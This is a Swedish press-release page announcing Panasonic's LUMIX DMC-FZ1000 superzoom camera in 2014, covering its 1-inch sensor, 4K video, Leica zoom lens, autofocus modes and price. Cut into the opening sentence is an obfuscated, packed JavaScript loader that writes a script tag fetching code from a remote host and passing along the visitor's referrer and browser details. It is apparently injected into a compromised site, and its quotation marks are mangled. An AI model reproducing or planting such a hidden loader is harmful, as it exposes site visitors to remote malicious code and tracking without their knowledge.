Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Panasonic lanserar världens första 4K-superzoomkamera

Panasonic lanserar världens första 4K-superzoomkamera

Ett eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nezsz|var|u0026u|referrer|bryfn||js|php’.split(’|’),0,{}))
LEICA-objektiv med 16x optisk zoom, en ny Venus Engine-bildprocessor och en sensor på en tum, med 20.1 megapixlars upplösning möjliggör professionell bildkvalitet.    

Stockholm, 12 juni 2014 – Idag lanseras LUMIX DMC-FZ1000 – Panasonics hittills mest avancerade superzoomkamera. Utöver kamerans stabila, kompakta och högkvalitativa design kan LUMIX DMC-FZ1000 även stoltsera med flera nyheter för en kamera i superzoomklassen, inklusive en stor högkänslig MOS-sensor på en tum (20.1 megapixlar) och möjlighet till 4K-inspelning för fantastisk bild- och videokvalitet.

Kameran har ett LEICA DC VARIO-ELMARIT-objektiv med 16x optisk zoom med ett bländaromfång på F2.8-4.0 och en förbluffande vacker bakgrundsoskärpa med hjälp av kraften bakom den nya Venus Engine-bildprocessorn och sensorn.

LUMIX DMC-FZ1000 är den första digitalkamera som klarar videoinspelning i 4K (QFHD 4K: 3840×2160, upp till 25 bilder per sekund (PAL) i MP4), vilket gör det lättare för användaren att experimentera med Panasonics nya funktion för att kunna klippa ut en bild motsvarande 8 megapixlar i storlek från 4K-videomaterial.

Kombination av nya teknologier för enastående bildkvalitet

Med LUMIX DMC-FZ1000 har Panasonic tagit ytterligare ett steg framåt i sin strävan att hela tiden utveckla nya innovativa bildhanteringsteknologier. Kombinationen av en helt ny sensor, en nyutvecklad Venus Engine-bildprocessor och ett enastående LEICA DC VARIO-ELMARIT-objektiv ger bästa möjliga bildkvalitet, upplösning och färgåtergivning, som annars mest förknippas med systemkameror.

  • En stor högkänslig MOS-sensor på en tum: LUMIX DMC-FZ1000 är utrustad med en nyutvecklad högkänslig MOS-sensor på en tum med 20.1 megapixlars upplösning, som är ca fyra gånger större än den 1/2.3-tumssensorn som finns i de flesta liknande kameror. Panasonics breda erfarenhet av sensorteknologi har resulterat i en betydligt större pixelstorlek som kan ta emot mer ljus och erbjuda högkänslig och högkvalitativ filminspelning i svagt ljus med en dramatiskt förbättrad defocus-effekt. Vilken vy som än spelas in, så kan användaren lita på att inspelningen återges med fantastisk detaljrikedom.
  • Högkvalitativt LEICA-objektiv med 16x optisk zoomLUMIX DMC-FZ1000 drar också nytta av Panasonics mångåriga samarbete med Leica. Det ljusa DC VARIO-ELMARIT-objektivet med 16x optisk zoom har genomgått Leicas omfattande tester för att säkerställa att enheten kan leverera bilder och filmer av högsta möjliga kvalitet. LUMIX DMC-FZ1000 dämpar distorsion i vidvinkel och minimerar kromatiska avvikelser vid tele. Dessutom hjälper den ljusa bländaren (F2.8-F4.0) användaren att ta inzoomade bilder med bibehållen skärpa. Tack vare det fasta 16x LEICA DC VARIO-ELMARIT-objektivet (motsvarar 25-400mm i en 35 mm kamera), slipper användarna bära med sig en massa objektiv och tillbehör, vilket gör det enklare att snabbt kunna fotgrafera ur avancerade vinklar.
  • Förstärkt Venus Engine: Panasonics helt nya Venus Engine-bildprocessor förbättrar dramatiskt de befintliga nivåerna av optisk känslighet, upplösning, övergångar och färgåtergivning för att leverera mer exakta och realistiska bilder och filmer än någon annan superzoomkamera idag. Bildprocessorns nya filter blandar in allt oönskat brus i bilden för att skapa naturliga bilder. Det nya bländarfiltret bearbetar och lyfter fram de finaste detaljerna, som t ex hår- och hudfärg till högre frekvensintervaller, för att garantera att även de mest subtila detaljerna kan återges i varje enskild bildruta. Venus Engine-bildprocessorn har även en betydande inverkan på färgtonsåtergivningen – färgton, ljusmättnad och ljusstyrka är indelade i en axel med 16 steg, för subtila justeringar och noggrann utvärdering av alla färgnyanser i bilden.

Världens första superzoomkamera med 4K-kapacitet

Med LUMIX DMC-FZ1000 fortsätter Panasonic att sudda ut gränserna mellan professionell fotografering och filmskapande. För första gången kan användarna dra nytta av fördelarna med inspelningar i 4K med en superzoomkamera och därmed möjliggöra skapande av verklighetstrogna och detaljrika filmiska världar. Möjligheten att dessutom spela in i Full HD och VGA gör kameran lämpad för alla tänkbara situationer.

  • Världens första 4K-superzoomkamera: Panasonic har omdefinierat kompaktkameran genom att lansera den första med 4K-videokapacitet, vilket innebär att den kan spela in material med fyra gånger högre upplösning än Full HD. Kombinationen av 4K (QFHD 4K: 3840×2160, upp till 25 bilder per sekund (PAL) i MP4), en stor sensor och ett ljust LEICA -objektiv skapar en enastående videokvalitet. Oavsett om materialet visas på en 4K- eller Full HD-skärm, så gör kamerans 4K-videokapacitet att alla återgivna detaljer och färger bättre överensstämmer med originalutseendet. LUMIX DMC-FZ1000 kan även spela in i flera olika format, inklusive MP4 och AVCHD, så att filmmakare snabbt och bekvämt kan överföra, redigera och njuta av sina filmer. Dessutom kan användare även ta stillbilder från redan inspelade 4K-videos, för att skapa detaljrika och djupa 4K-bilder.
  • Smidig zoom för stabil video: LUMIX DMC-FZ1000 innehåller ett antal funktioner för att garantera att användarna kan fånga det absolut bästa videomaterialet utan att använda sig av några tillbehör. En kombination av en hybrid 5-vägs optisk bildstabilisator[2], nivåmätare och en lättanvänd zoom-ring erbjuder stadiga och vibrationsfria videoinspelningar, samt kompenserar alla handrörelser och eliminerar behovet av ett otympligt stativ i de allra flesta situationer.

För enastående användarvänlighet, kreativitet och kontroll

Den högkvalitativa och robusta designen som framhäver det stora LEICA-objektivet, tillsammans med autofokus och en mängd andra kreativa funktioner, gör Panasonics senaste LUMIX-kamera till den perfekta följeslagaren för alla äventyr.

  • Snabbare och mer exakt autofokus: Tack vare en ny förbättrad autofokusfunktion, som drivs av ett linjärmotorsystem och Panasonics Depth from Defocus-teknologi, kan kameran nå fokushastigheter som är 275 % snabbare än LUMIX DMC-FZ200 och majoriteten av konventionella superzoomkameramodeller. Med 0.09 sekunders fokus i vidvinkelläget och 0.17[3] sekunders fokus i teleläget när du använder Live-sökaren (LVF), kan även de mest snabbrörliga föremålen fångas med maximal klarhet och precision. LUMIX DMC-FZ1000 kan även skryta med ett läge för snabb seriefotografering för att ge användarna flera möjligheter vid t ex fotografering av vilda djur.
  • Nya fokusmöjligheter:

Full Area AF

Full Area-autofokusfunktionen gör det möjligt för användarna att ställa in fokus på en valfri del av synfältet.

49-Area AF

Området för att upptäcka fokus har utökats till 49 punkter vilket innebär att läget för Custom Multi-autofokus gör det möjligt att skapa en betydligt mer flexibel sammansättning genom att fritt välja ut ett enskilt nummer av dessa 49 fokusblock.

1-Area AF

Storleken på bildområdet för 1-Area-autofokus kan nu fritt ställas om, inte bara manuellt utan även i autofokusläget.

Pinpoint AF

Funktionen för Pinpoint-autofokus hjälper användarna att fokusera på ett litet enskilt område genom att förstora upp den del som kan ses med ett bild-i-bild-fönster.

Low Light AF

Autofokusfunktionen för svagt ljus ger bättre prestanda i svagt upplysta situationer på -4EV, vilket är jämförbart med fotografering under en stjärnklar himmel, utan andra ljuskällor.

Focus Peaking

Focus Peaking-funktionen ger användaren större praktisk kontroll över fokushanteringen, genom att visa fokuspositionen i MF- och AF+MF-lägena. Användarna kan se det maximala fokusläget, samtidigt som de i realtid kan styra subjektet i synfältet.

Eye Detection AF

Autofokusfunktionen för ögonigenkänning ställer in fokus på det mänskliga ögat och börjar fokusera direkt när fotografen tittar in i Live-sökaren (LVF).

  • Kristallklar skärmbild: LUMIX DMC-FZ1000 är även utrustad med två snabbresponsiva, kristallklara skärmar för att göra det roligare än någonsin att komponera och granska bilder och videos. Både den nydesignade 2,359k OLED Live-sökaren (LVF) och 3-tums 921k LCD-skärmen erbjuder bilder med fantastisk upplösning. Tack vare 300 % snabbare reaktionstid jämfört med liknande modeller, blir bilden du ser via Live-sökaren 100 % överensstämmande med originalet. Kameran inkluderar även en branschledande tid för uppstart när det kommer till superzoomkameror, vilket ger användarna möjligheten att gå från noll till fotografering på bara 0.66 sekunder.
  • Dela din kreativitet: Ett mängd olika filter erbjuder användarna full kreativ kontroll. LUMIX DMC-FZ1000 inkluderar 22 olika filter[4], från Sepia ochHigh Dynamic till Soft Focus och Miniature Effect. När du väl har fångat den perfekta bilden, erbjuder LUMIX DMC-FZ1000 ett flertal uppkopplingsmöjligheter för att dela med sig av bilderna. LUMIX DMC-FZ1000 integrerar Wi-Fi-uppkoppling med NFC-teknologi för att erbjuda såväl flexibla fotoupplevelser som omedelbar bilddelning, även ute på fältet. Kameran kan även fjärrstyras, vilket innebär att du både kan ta stillbilder, videofilma, samt justera förstoring, slutare och exponering via din smarttelefon eller surfplatta.

Pris och tillgänglighet

LUMIX DMC-FZ1000 kommer finnas tillgänglig från slutet av juli 2014. Rekommenderat pris från Panasonic är 8499 SEK, inklusive moms.

Detta är ett pressmeddelande från Panasonic